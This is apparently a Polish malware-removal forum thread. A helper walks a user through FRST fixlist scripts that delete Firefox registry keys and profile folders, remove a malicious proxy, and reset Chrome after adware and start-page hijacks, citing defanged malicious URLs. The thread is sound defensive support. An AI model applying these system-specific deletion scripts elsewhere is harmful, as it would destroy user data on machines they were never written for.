{CD55129A-B1A1-438E-A425-CEBC7DC684EE} => -> Brak pliku ShellIconOverlayIdentifiers: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Brak pliku GroupPolicy: Ograniczenia - Chrome CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-1147513825-3514968562-1571062963-1002 -> {4E31FA06-A5E2-4F3C-BE71-05C961498981} URL = CHR StartupUrls: Default -> "hxxp://www.istartsurf.com/?type=hp&ts=1436956595&z=bf2afada6854750a0699ba0g9zdc1q5tdwcq8w4m6w&from=cor&uid=ST1000LM014-1EJ164_W380C4H1XXXXW380C4H1" R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X] C:\Users\Dawid\Desktop\programy naprawiające\Malwarebytes Anti-Malware.lnk DeleteKey: HKCU\Software\Mozilla\Firefox DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla\Firefox DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Dawid\AppData\Local\Mozilla\Firefox C:\Users\Dawid\AppData\Roaming\Mozilla\Firefox C:\Users\Dawid\AppData\Roaming\Profiles EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze, z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt 3. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie inne nieznane i niepotrzebne Ci rozszerzenia Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut). Dołącz też plik fixlog.txt.

OK. OK. Tj. alert dot. wykrycia fałszywej przeglądarki, która została przeze już usunięte (= alert późniejszy). Taki program nie jest w ogóle zainstalowany - napraw bądź zainstaluj program na nowo. Myślę, że od strony tego działu możemy kończyć. Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.

OK. P.S: Ja raczej nie mam zwyczaju zamykania tematu.

Jak podsumowujesz obecną sytuację? Czy problem ustąpił?

W systemie zostały ustawione jedynie szkodliwe proxy, które mogą być winowajcami wyświetlających się reklam. Po za kasacją proxy sprzątam w systemie pliki tymczasowe, szczątki po programach. Widzę, że obecna jest tylko przeglądarka Mozilla FireFox (Google Chrome w ogólnie nie widać - na pewno robiłeś raporty przed jej instalacją?). 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-2662483725-3314199631-1332502659-1001\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 AutoConfigURL: [s-1-5-21-2662483725-3314199631-1332502659-1001] => hxxp://web-access.biz/wpad.dat?06534bf7c4d8ab84747f590310f6313629718877 ManualProxies: 0hxxp://web-access.biz/wpad.dat?06534bf7c4d8ab84747f590310f6313629718877 HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = S2 SAService; Brak ImagePath RemoveProxy: EmptyTemp: 2. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.